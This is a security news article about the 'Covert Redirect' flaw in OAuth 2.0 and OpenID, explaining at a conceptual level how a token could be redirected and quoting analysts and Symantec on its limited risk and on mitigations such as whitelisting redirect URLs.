Is 'Covert Redirect' Flaw a Big Deal?

A newly reported flaw in open-source authorization services, which has been named Covert Redirect, is gaining attention in the aftermath of the widely publicized Heartbleed bug. But security experts say this newly identified bug doesn't appear to pose as big a risk as Heartbleed.

The flaw affects OAuth 2.0 and OpenID, tools that allow users to sign in to certain online services using an existing identity for other sites, such as Facebook, Google and Yahoo. Because of the flaw, a cyber-attacker could potentially compromise the OAuth and OpenID process and steal the information that the user entered, including their e-mail address. But so far, there's no reported evidence attackers have capitalized on the flaw.

Compared to Heartbleed, which exposed a vulnerability in OpenSSL, a widely used cryptographic tool that provides communication security and privacy over the Internet, the Covert Redirect flaw is relatively isolated, says Al Pascual, a senior fraud and security analyst at Javelin Strategy and Research.

"While the use of OAuth and OpenID are pervasive across the Web, this bug is not anywhere near as worrisome as Heartbleed," he says.

Still, sites that rely on OAuth 2.0 and OpenID need to make their users aware of the potential risks.

Covert Redirect

The Covert Redirect flaw was first reported, and named, by security researcher Wang Jing, a PhD student in mathematics at the Nanyang Technological University in Singapore, who says the flaw in OAuth 2.0 and OpenID impacts all users of the authorization standards, including Facebook, Google, Yahoo, LinkedIn and Microsoft, among others.

For the exploit to work, an Internet user would have to visit a malicious site or application and then log in using the OAuth 2.0 or OpenID process, says Andreas Baumhof, chief technology officer at anti-fraud vendor ThreatMetrix.

Say, for instance, the user logged into a website using Facebook credentials. Once the OAuth 2.0 or OpenID process was completed, a cyber-attacker, taking advantage of the flaw, could redirect the token used by OAuth 2.0 or OpenID to access information on Facebook, granting the attacker access to whatever information the user has shared, Baumhof says.

How Big Is The Risk?

Security firm Symantec, in a May 3 blog, notes that while Heartbleed could be exploited just by issuing requests to unpatched servers, Covert Redirect requires an attacker to find a susceptible application as well as acquire interaction and permissions from users.

"Covert Redirect is a security flaw, not a vulnerability," Symantec says. "It takes advantage of third-party clients susceptible to an open redirect."

For the flaw to be exploited, Symantec says, a user would have to grant permissions to a susceptible application in order for the access token to be compromised. "An attacker may then obtain user account data which could be used for further malicious purposes."

Yet Baumhof of Threatmetrix says the flaw poses some concern, because a fix is not straightforward. Similarly, Symantec notes: "Do not expect a patch. It is up to the service providers to secure their own implementations to effectively address the Covert Redirect flaw."

Mitigating the Risks

Organizations and users can take steps to mitigate the risks involved with the Covert Redirect flaw.

Symantec says Internet users need to be careful about what applications and websites they're accessing through OAuth and OpenID. Application developers also need to be mindful of open redirects on their websites. "It is important to lock down open redirects on your website," Symantec says. "Service providers also recommend application developers create a whitelist of OAuth redirect URLs."

Pascual adds: "As long as users do not interact with malicious links and/or websites, the risk is negligible. Users should be on the lookout for an increase in unsolicited e-mails that purport to be from Facebook or other sites that utilize Facebook credentials for single sign-on."

Sites that rely on the OAuth 2.0 and OpenID credentialing process should make their users aware of the vulnerability and provide recommendations for how to avoid having their sensitive information compromised, Pascual says.

About the Author

Roman is the former News Writer for Information Security Media Group. Having worked for multiple publications at The College of New Jersey, including the College's newspaper "The Signal" and alumni magazine, Roman has experience in journalism, copy editing and communications.

Operation Success!

Risk Management Framework: Learn from NIST

From heightened risks to increased regulations, senior leaders at all levels are pressured to
improve their organizations' risk management capabilities. But no one is showing them how -
until now.

Learn the fundamentals of developing a risk management program from the man who wrote the book
on the topic: Ron Ross, computer scientist for the National Institute of Standards and
Technology. In an exclusive presentation, Ross, lead author of NIST Special Publication 800-37
- the bible of risk assessment and management - will share his unique insights on how to:

Understand the current cyber threats to all public and private sector organizations;

Develop a multi-tiered risk management approach built upon governance, processes and
information systems;

Enter your email address to reset your password

Already have anISMG account?

Forgot Your Password Message:

Contact Us

Already have anISMG account?

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing bankinfosecurity.co.uk, you agree to our use of cookies.